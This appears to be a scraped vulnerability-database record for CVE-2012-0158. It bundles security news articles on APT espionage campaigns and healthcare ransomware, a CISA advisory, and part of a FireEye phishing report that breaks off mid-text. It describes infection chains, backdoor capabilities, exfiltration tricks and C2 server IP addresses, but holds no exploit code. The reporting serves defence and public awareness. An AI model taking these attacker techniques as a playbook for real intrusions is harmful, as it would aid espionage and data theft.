\n \nPalo Alto Networks ascertained that the ransomware strain was EDA2 based on the code structure of the binary and the host-based and network-based behaviors of the ransomware. EDA2 and Hidden Tear are considered one of the [first open-source ransomware](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-open-source-ransomwar-based-on-hidden-tear-and-eda2-may-target-businesses/>) that were created for educational purposes but have since been abused by hackers to pursue their own interests. \n \n\n\n## A Spike in Ransomware Incidents\n\n \nThe ransomware attacks are a consequence of an [increase in other cyberattacks](<https://thehackernews.com/2020/03/covid-19-coronavirus-hacker-malware.html>) related to the pandemic. They have included a rash of [phishing emails](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) that attempt to use the crisis to persuade people to click on links that download malware or ransomware onto their computers. \n \nFurthermore, Check Point Research's Brand Phishing Report for Q1 2020 observed a jump in mobile phishing due to people spending more time on their phones for information related to the outbreak and for work. Attackers were found imitating popular services such as Netflix, Airbnb, and Chase Bank to steal login credentials. \n \nWith hospitals under time constraints and pressure due to the ongoing pandemic, hackers are counting on the organizations to pay ransoms to recover access to critical systems and prevent disruption to patient care. \n \nA report released by [RisKIQ](<https://www.riskiq.com/wp-content/uploads/2020/04/Ransomware-in-Health-Sector-Intelligence-Brief-RiskIQ.pdf>) last week found that ransomware attacks on medical facilities were up 35% between 2016 and 2019, with the average ransom demand being $59,000 across 127 incidents. 
The cybersecurity firm stated that hackers also favored small hospitals and healthcare centers for reasons ranging from lean security support to increased likelihood of heeding to ransom demands. \n \nThe spike in ransomware attacks against the medical sector has prompted [Interpol](<https://www.interpol.int/en/News-and-Events/News/2020/Cybercriminals-targeting-critical-healthcare-institutions-with-ransomware>) to issue a warning about the threat to member countries. \n \n\"Cybercriminals are using ransomware to hold hospitals and medical services digitally hostage, preventing them from accessing vital files and systems until a ransom is paid,\" the agency said. \n \nTo protect the systems from such attacks, Interpol cautioned organizations to watch out for phishing attempts, encrypt sensitive data, and take periodic data backups, aside from storing them offline or on a different network to thwart cybercriminals.\n", "cvss3": {}, "published": "2020-04-14T10:00:00", "type": "thn", "title": "Hackers Targeting Critical Healthcare Facilities With Ransomware During Coronavirus Pandemic", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2020-04-15T10:08:57", "id": "THN:8007E43933D6EA07FB6E74E9DCC5FA70", "href": "https://thehackernews.com/2020/04/ransomware-hospitals-coronavirus.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T17:36:21", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj5bP38ayXt3WUgoCPr1MM_l_XoOSBHW7RA85wFIe5_jGUGg0_CPoMB25tHssF2g1NTVNsj0F2qTcIlaA9SIKLzy-XkwB-7qGzBB-3b6FhDSPjeXTrHmyiLjIpcZz6mePl003SOEAoGsbC2fAngnHZakExhsEZpZxfRjQ8MN1OF28_ifsCXJ_67ZMpu/s728-e100/china.jpg>)\n\nA previously undocumented Chinese-speaking advanced persistent threat (APT) actor dubbed **Aoqin Dragon** has been linked to a string of espionage-oriented attacks aimed at government, education, and telecom entities chiefly in Southeast Asia and Australia dating as far back as 2013.\n\n\"Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices,\" SentinelOne researcher Joey Chen [said](<https://s1.ai/aoqin>) in a report shared with The Hacker News. \"Other techniques the attacker has been observed using include DLL hijacking, [Themida-packed files](<https://blog.malwarebytes.com/detections/trojan-malpack-themida/>), and DNS tunneling to evade post-compromise detection.\"\n\nThe group is said to have some level of tactical association with another threat actor known as [Naikon](<https://thehackernews.com/2022/05/chinese-override-panda-hackers.html>) (aka Override Panda), with the campaigns primarily directed against targets in Australia, Cambodia, Hong Kong, Singapore, and Vietnam.\n\nInfections chains mounted by Aoqin Dragon have banked on Asia-Pacific political affairs and pornographic-themed document lures as well as USB shortcut techniques to trigger the deployment of one of two backdoors: Mongall and a modified version of the open-source [Heyoka project](<https://heyoka.sourceforge.net/>).\n\nUp until 2015, this involved leveraging exploits for old and unpatched security vulnerabilities ([CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/cve-2012-0158>) and [CVE-2010-3333](<https://nvd.nist.gov/vuln/detail/cve-2010-3333>)) in the decoy documents that were designed to entice targets into opening them. 
Over the years, the threat actor has evolved its approach to employ executable droppers masquerading as antivirus software from McAfee and Bkav to deploy the implant and connect to a remote server.\n\n\"Although executable files with fake file icons have been in use by a variety of actors, it remains an effective tool especially for APT targets,\" Chen explained. \"Combined with 'interesting' email content and a catchy file name, users can be socially engineered into clicking on the file.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEimnjl-Gy2EJZ3R9vL99RHfhTsboA8UgDxcZBYmox7pOu3fMPSz7g-s9V77BTnIPyDOmFhUmLi0H8ShxY2pR5AVbXiR8QVzdZC5W_y4QgJPO3Xi6A1MrLaxYBkoDdgTXDFMqB59bRnoPj5h_yAGHVLz7yetxauPq9_A5prtDDtFbSaI5UeNpTvw-6bP/s728-e100/labs.jpg>)\n\nThat said, Aoqin Dragon's newest initial access vector of choice since 2018 has been its use of a fake removable device shortcut file (.LNK), which, when clicked, runs an executable (\"RemovableDisc.exe\") masked with the icon for the popular note-taking app Evernote but is engineered to function as a loader for two different payloads.\n\nOne of the components in the infection chain is a spreader that copies all malicious files to other removable devices and the second module is an encrypted backdoor that injects itself into [rundll32](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32>)'s memory, a [native Windows process](<https://redcanary.com/threat-detection-report/techniques/rundll32/>) used to load and run DLL files.\n\nKnown to be [used](<https://www.welivesecurity.com/wp-content/uploads/2013/12/Advanced-Persistent-Threats.pdf>) since at least 2013, Mongall (\"HJ-client.dll\") is described as a not-so \"particularly feature rich\" implant but one that packs enough features to create a remote shell and upload and download arbitrary files to and from the attacker-control server.\n\nAlso used by the adversary is a reworked variant of Heyoka (\"srvdll.dll\"), a 
proof-of-concept (PoC) exfiltration tool \"which uses spoofed DNS requests to create a bidirectional tunnel.\" The modified Heyoka backdoor is more powerful, equipped with capabilities to create, delete, and search for files, create and terminate processes, and gather process information on a compromised host.\n\n\"Aoqin Dragon is an active cyber espionage group that has been operating for nearly a decade,\" Chen said, adding, \"it is likely they will also continue to advance their tradecraft, finding new methods of evading detection and stay longer in their target network.\"\n", "cvss3": {}, "published": "2022-06-09T11:00:00", "type": "thn", "title": "A Decade-Long Chinese Espionage Campaign Targets Southeast Asia and Australia", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3333", "CVE-2012-0158"], "modified": "2022-06-09T16:31:58", "id": "THN:25E1C5E39F109FC80A69CCF02734A606", "href": "https://thehackernews.com/2022/06/a-decade-long-chinese-espionage.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-01-08T18:01:15", "description": 
"[](<http://3.bp.blogspot.com/-u4tWthaiHas/UkWq-HnhGBI/AAAAAAAAXy0/QcH2jC5FGbA/s1600/Chinese+APT+Espionage+campaign,+dubbed+'Icefog'+targeted+Military+contractors+and+Governments.png>)\n\n**Kaspersky Lab** has identified another [Chinese APT campaign](<http://thehackernews.com/search/label/APT1>), dubbed \u2018**Icefog**\u2019, who targeted Governmental institutions, Military contractors, maritime / shipbuilding groups, telecom operators, industrial and high technology companies and mass media.\n\n \n\n\nThe Hacking group behind the attack who carry out surgical [hit and run operations](<http://thehackernews.com/search/label/cyber%20espionage>), is an [advanced persistent threat](<http://thehackernews.com/search/label/Chinese%20Hackers>) (APT) group, used a backdoor dubbed Icefog that worked across Windows and [Mac OS X](<http://thehackernews.com/search/label/Mac%20OS>) to gain access to systems.\n\n\"_The Mac OS X backdoor currently remains largely undetected by security solutions and has managed to infect several hundred victims worldwide_,\" [the report](<http://www.securelist.com/en/downloads/vlpdfs/icefog.pdf>) (PDF) said. \n \n\n\nThis China-based [campaign](<http://thehackernews.com/2013/02/mandiant-revealed-chinese-apt1-cyber.html>) is almost two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a [spear-phishing](<http://thehackernews.com/search/label/Spear%20Phishing>) email, or are lured to a compromised website and infected with [malware](<http://thehackernews.com/search/label/Malware>).\n\nThe attackers embed exploits for several known [vulnerabilities](<http://thehackernews.com/search/label/Vulnerability>) (CVE-2012-1856 and CVE-2012-0158) into Microsoft Word and Excel documents.\n\n \n\n\nOnce a computer has been compromised, the hackers upload [malicious tools](<http://thehackernews.com/search/label/hacking%20tool>) and backdoors. 
They look for email account credentials, sensitive documents and passwords to other systems.\n\n[](<http://2.bp.blogspot.com/-XiMXWdrJEd0/UkWrQ-NuzjI/AAAAAAAAXy8/Otpp4n6YeSY/s1600/Spear+phishing+mail.png>)\n\n \n\n\n\"_We observed many victims in several other countries, including Taiwan, Hong Kong, China, USA, Australia, Canada, UK, Italy, Germany, Austria, Singapore, Belarus and Malaysia_,\" the research team said.\n\n \n\n\nThere is no concrete evidence to confirm this was a nation-state sponsored operation, but based on where the stolen data were transferred to, Kaspersky wrote the attackers are assumed to be in China, South Korea and Japan.\n\n[](<http://4.bp.blogspot.com/-ZFm4K6kLoyI/UkWsMlnzypI/AAAAAAAAXzI/bJ9suAFvclM/s1600/statistics.png>)\n\nIn total, Kaspersky Lab observed more than 4,000 uniquely infected IPs and several hundred victims. They are now in contact with the targeted organizations as well as government entities in order to help them identify and eradicate the infections.\n", "cvss3": {}, "published": "2013-09-27T05:05:00", "type": "thn", "title": "Chinese APT Espionage campaign, dubbed 'Icefog' targeted Military contractors and Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-1856", "CVE-2012-0158"], "modified": "2013-09-27T16:12:43", "id": "THN:59AA6ADFEEB67D7E156CDF3579330697", "href": "http://thehackernews.com/2013/09/chinese-apt-espionage-campaign-dubbed.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:37:57", "description": "[](<https://thehackernews.com/images/-2P9JF1_9yIc/YMdax55TYnI/AAAAAAAAC2o/YR05yeE9O-8JHf9oekreAzoMGSYXbsdlwCLcBGAsYHQ/s0/suppply-chain-cyberattack.jpg>)\n\nA new cyber espionage group named Gelsemium has been linked to a [supply chain attack targeting the NoxPlayer](<https://thehackernews.com/2021/02/a-new-software-supplychain-attack.html>) Android emulator that was disclosed earlier this year.\n\nThe 
findings come from a systematic analysis of multiple campaigns undertaken by the APT crew, with evidence of the earliest attack dating back all the way to 2014 under the codename [Operation TooHash](<https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf>) based on malware payloads deployed in those intrusions.\n\n\"Victims of these campaigns are located in East Asia as well as the Middle East and include governments, religious organizations, electronics manufacturers and universities,\" cybersecurity firm ESET [said](<https://www.welivesecurity.com/2021/06/09/gelsemium-when-threat-actors-go-gardening/>) in an analysis published last week.\n\n\"Gelsemium's whole chain might appear simple at first sight, but the exhaustive configurations, implanted at each stage, modify on-the-fly settings for the final payload, making it harder to understand.\"\n\nTargeted countries include China, Mongolia, North and South Korea, Japan, Turkey, Iran, Iraq, Saudi Arabia, Syria, and Egypt.\n\nSince its origins in the mid-2010s, Gelsemium has been found employing a variety of malware delivery techniques ranging from spear-phishing documents exploiting Microsoft Office vulnerabilities ([CVE-2012-0158](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>)) and watering holes to a remote code execution flaw in Microsoft Exchange Server \u2014 likely [CVE-2020-0688](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688>), which was addressed by the Windows maker in [June 2020](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>) \u2014 to deploy the [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell.\n\n[](<https://thehackernews.com/images/-erpEkE7yQsA/YMdYTWXAq3I/AAAAAAAAC2g/aFWtWeFaNBkcFx5QqUn08XgGEREESzmBQCLcBGAsYHQ/s0/malware.jpg>)\n\nAccording to ESET, Gelsemium's first stage is a C++ dropper named \"Gelsemine,\" which deploys a loader \"Gelsenicine\" 
onto the target system, which, in turn, retrieves and executes the main malware \"**Gelsevirine**\" that's capable of loading additional plug-ins provided by the command-and-control (C2) server.\n\nThe adversary is said to have been behind a supply chain attack aimed at BigNox's NoxPlayer, in a campaign dubbed \"**Operation NightScout**,\" in which the software's update mechanism was compromised to install backdoors such as **Gh0st RAT** and **PoisonIvy RAT** to spy on its victims, capture keystrokes, and gather valuable information.\n\n\"Victims originally compromised by that supply chain attack were later being compromised by Gelsemine,\" ESET researchers Thomas Dupuy and Matthieu Faou noted, with similarities observed between the trojanized versions of NoxPlayer and Gelsemium malware.\n\nWhat's more, another backdoor called **Chrommme**, which was detected on an unnamed organization's machine also compromised by the Gelsemium group, used the same C2 server as that of Gelsevirine, raising the possibility that the threat actor may be sharing the attack infrastructure across its malware toolset.\n\n\"The Gelsemium biome is very interesting: it shows few victims (according to our telemetry) with a vast number of adaptable components,\" the researchers concluded. \"The plug-in system shows that developers have deep C++ knowledge.\"\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-14T13:34:00", "type": "thn", "title": "NoxPlayer Supply-Chain Attack is Likely the Work of Gelsemium Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2020-0688"], "modified": "2021-06-14T13:34:33", "id": "THN:9B536B531E6948881A29BEC793495D1E", "href": "https://thehackernews.com/2021/06/noxplayer-supply-chain-attack-is-likely.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-01-08T18:01:26", "description": "A new and sensational discovery has been announced by Kaspersky Lab\u2019s Global Research & Analysis Team as the result of an investigation into several attacks that hit the computer networks of various international diplomatic service agencies.\n\nA new large scale 
[cyber-espionage](<http://securityaffairs.co/wordpress/11405/intelligence/cyberespionage-another-watering-hole-attack-against-us-website.html>) operation has been discovered, named **Red October** (**ROCRA**), a name inspired by the novel **The Hunt for Red October** and chosen because the investigation started last October.\n\nThe campaign hit hundreds of machines belonging to the following categories:\n\n * Government\n * Diplomatic / embassies\n * Research institutions\n * Trade and commerce\n * Nuclear / energy research\n * Oil and gas companies\n * Aerospace\n * Military\n\nThe attackers have targeted various devices such as enterprise network equipment and mobile devices (Windows Mobile, iPhone, Nokia), hijacking files from removable disk drives, stealing e-mail databases from local Outlook storage or remote POP/IMAP servers and siphoning files from local network FTP servers.\n\nAccording to the security experts involved in the investigation, the cyber-espionage campaign has been running since 2007 and is still active; during this long period the attackers obtained a huge quantity of information, such as service credentials that have been reused in later attacks.\n\nThe control infrastructure discovered is complex and extensive: more than 60 domain names and several hosting servers located in many countries, mainly Germany and Russia. A particularity of the C&C architecture is that every node in the malicious structure acts as a proxy, so the network is arranged to hide the true \"mothership\" server.\n\nSecurity experts were able to sinkhole six of the 60 domains during the period 2 Nov 2012 - 10 Jan 2013, registering over 55,000 connections to the sinkhole from 250 different victim IPs in 39 different countries, with most of the IPs being from Switzerland. 
Kazakhstan and Greece follow next.\n\n**Red October Geo-distribution of victims**\n\nWhich vulnerabilities were exploited in the attacks?\n\nThe researchers found that at least three known vulnerabilities were exploited:\n\n * CVE-2009-3129 (MS Excel) [attacks dated 2010 and 2011]\n * CVE-2010-3333 (MS Word) [attacks conducted in the summer of 2012]\n * CVE-2012-0158 (MS Word) [attacks conducted in the summer of 2012]\n\nEvidence collected during the investigation leads the researchers to believe that the attackers have Russian origins, but strangely they appear unrelated to any other cyber attacks detected until now, while the exploits appear to have been created by Chinese hackers.\n\n**Attack Method**\n\nThe attacks are structured in two distinct phases, following the classic schema of targeted attacks:\n\n 1. Initial infection\n 2. Additional modules deployed for intelligence gathering\n\nIn the initial phase the malware is delivered as an e-mail attachment (Microsoft Excel, Word and probably PDF documents). Once the victim opens the malicious document, the embedded code installs the main component, which in turn handles further communication with the C&C servers; the malware then receives a number of additional spy modules from the C&C server.\n\nThe way the entire network is infected is very efficient: the hackers use a module to scan the target infrastructure for vulnerable machines. Each machine and its services are then attacked by exploiting the vulnerabilities above, or accessed with credentials collected during other attacks of the same campaign.\n\nWhat alarms me is that such campaigns could be going on for years with disastrous consequences ... _what to do at this point? 
How is it possible that an operation so extensive escaped the worldwide security community for so long? Who is behind the attacks? Cyber criminals or state-sponsored hackers?_\n\n**UPDATE 2013/01/15**\n\nJeffrey Carr, founder and CEO of Taia Global, Inc, posted on [his blog](<http://jeffreycarr.blogspot.it/2013/01/rbn-connection-to-kasperskys-red.html>):\n\nThe developers behind ROCRA, who are Russian, are comfortable using Chinese malware and adapting it for their own use according to the Kaspersky report. This fits the RBN profile to a \u2018t\u2019. I ran 13 IPs listed in Kaspersky\u2019s report against the [RBN list](<http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt>) maintained by James McQuade and found matching IP blocks for five of them:\n\n**Malicious servers**\n\n * 178.63.208.49 matches to 178.63.\n * 188.40.19.247 matches to 188.40.\n * 78.46.173.15 matches to 78.46.\n * 88.198.30.44 matches to 88.198.\n\n**Mini-motherships**\n\n * 91.226.31.40 matches to 91.226.\n\nIt has been my belief for many years that the RBN has a working relationship with the Russian government; that it disappeared from view when the FBI sought the assistance of the FSB to shut down their operations in 2007 (as detailed in chapter 8 of my book); and that it has continued operating below the radar all this time. It provides distance and deniability to the FSB for certain offensive cyber operations and, in exchange, the FSB allows the RBN to operate as a criminal enterprise; a portion of which involves selling the data that it steals to whomever is interested.\n\nRed October is already the most significant find of the new year. 
If, in fact, Kaspersky has uncovered an RBN-controlled espionage ring, it\u2019s going to be one of the most important discoveries of the decade.\n", "cvss3": {}, "published": "2013-01-14T23:49:00", "type": "thn", "title": "Operation Red October : Cyber Espionage campaign against many Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2009-3129"], "modified": "2013-10-14T11:49:51", "id": "THN:B02C7C78600ED331232ABD4D1F8D2C4A", "href": "http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:38:26", "description": "[](<https://thehackernews.com/images/-XDTHXeRiSOs/XtiwKuAffDI/AAAAAAAAAZ0/agv-iIrKqt8IiznmwrS_g-Hhgu-R--8RgCLcBGAsYHQ/s728-e100/malware.jpg>)\n\nA Chinese threat actor has developed new capabilities to target air-gapped systems in an attempt to exfiltrate sensitive data for espionage, according to a newly published research by Kaspersky yesterday. \n \nThe APT, known as Cycldek, Goblin Panda, or Conimes, employs an extensive toolset for lateral movement and information stealing in victim networks, including previously unreported custom tools, tactics, and procedures in attacks against government agencies in Vietnam, Thailand, and Laos. \n \n\"One of the newly revealed tools is named **USBCulprit **and has been found to rely on USB media in order to exfiltrate victim data,\" [Kaspersky](<https://securelist.com/cycldek-bridging-the-air-gap/97157/>) said. 
\"This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\" \n \nFirst observed by [CrowdStrike](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) in 2013, Cycldek has a long history of singling out defense, energy, and government sectors in Southeast Asia, particularly Vietnam, using decoy documents that exploit known vulnerabilities (e.g., CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) in Microsoft Office to drop a malware called NewCore RAT. \n \n\n\n## Exfiltrating Data to Removable Drives\n\n \nKaspersky's analysis of NewCore revealed two different variants (named BlueCore and RedCore) centered around two clusters of activity, with similarities in both code and infrastructure, but also contain features that are exclusive to RedCore \u2014 namely a keylogger and an RDP logger that captures details about users connected to a system via RDP. \n \n\n\n[](<https://thehackernews.com/images/-Uo7TkL_TEQg/XtirFVGHNWI/AAAAAAAAAZk/3fpINW9IErAOfGCG0T7fZGr5K9LM3BnuACLcBGAsYHQ/s728-e100/usb-virus.jpg>)\n\n \n\"Each cluster of activity had a different geographical focus,\" the researchers said. \"The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018.\" \n \nBoth BlueCore and RedCore implants, in turn, downloaded a variety of additional tools to facilitate lateral movement (HDoor) and extract information (JsonCookies and ChromePass) from compromised systems. \n \nChief among them is a malware called USBCulprit that's capable of scanning a number of paths, collecting documents with specific extensions (*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf), and exporting them to a connected USB drive. 
\n\nWhat's more, the malware is programmed to copy itself selectively to certain removable drives so it can move laterally to other air-gapped systems each time an infected USB drive is inserted into another machine.\n\nA telemetry analysis by Kaspersky found that the first instance of the binary dates all the way back to 2014, with the latest samples recorded at the end of last year.\n\nThe initial infection mechanism relies on malicious binaries that mimic legitimate antivirus components to load USBCulprit through [DLL search order hijacking](<https://attack.mitre.org/techniques/T1038/>); the malware then collects the relevant information, saves it as an encrypted RAR archive, and exfiltrates the data to a connected removable device.\n\n\"The characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines,\" the researchers said. \"This would explain the lack of any network communication in the malware and the use of only removable media as a means of transferring inbound and outbound data.\"\n\nUltimately, the similarities and differences between the two pieces of malware indicate that the actors behind the clusters share code and infrastructure while operating as two offshoots of a single larger entity.\n\n\"Cycldek is an example of an actor that has broader capability than publicly perceived,\" Kaspersky concluded. 
\"While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\"\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-04T08:31:00", "type": "thn", "title": "New USBCulprit Espionage Tool Steals Data From Air-Gapped Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-04T08:31:39", "id": "THN:42E3306FC75881CF8EBD30FA8291FF29", "href": "https://thehackernews.com/2020/06/air-gap-malware-usbculprit.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Allows remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers \"system state\" corruption, as exploited in the wild in April 2012, aka \"MSCOMCTL.OCX Remote Code Execution Vulnerability.", "cvss3": {}, "published": "2021-11-03T00:00:00", 
"type": "cisa_kev", "title": "Microsoft MSCOMCTL.OCX Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2012-0158", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fireeye": [{"lastseen": "2017-12-14T08:35:01", "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. 
The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. 
Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. 
